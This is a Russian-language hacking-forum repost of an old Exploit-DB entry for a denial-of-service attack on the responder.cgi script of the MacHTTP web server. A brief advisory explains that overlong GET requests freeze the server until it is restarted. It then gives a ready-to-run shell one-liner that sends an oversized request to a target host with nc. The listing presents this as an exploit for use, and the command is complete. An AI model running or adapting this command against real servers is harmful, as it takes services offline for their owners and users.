Exploit John O'Fallon Responder.cgi 1.0 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21048
Проверка EDB
  1. Пройдено
Автор
EPIC
Тип уязвимости
DOS
Платформа
CGI
CVE
null
Дата публикации
1999-04-09
Код:
source: https://www.securityfocus.com/bid/3155/info

responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products.

It is possible to cause a denial of service to MacHTTP webserver due to improper bounds checking in the script 'responder.cgi'. HTTP GET requests with an excessive number of characters will cause the server to freeze.

The webserver will need to be restarted to regain normal functionality. 

$ echo "GET
/cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc
machttp-server.com 80
 
Источник
www.exploit-db.com

Похожие темы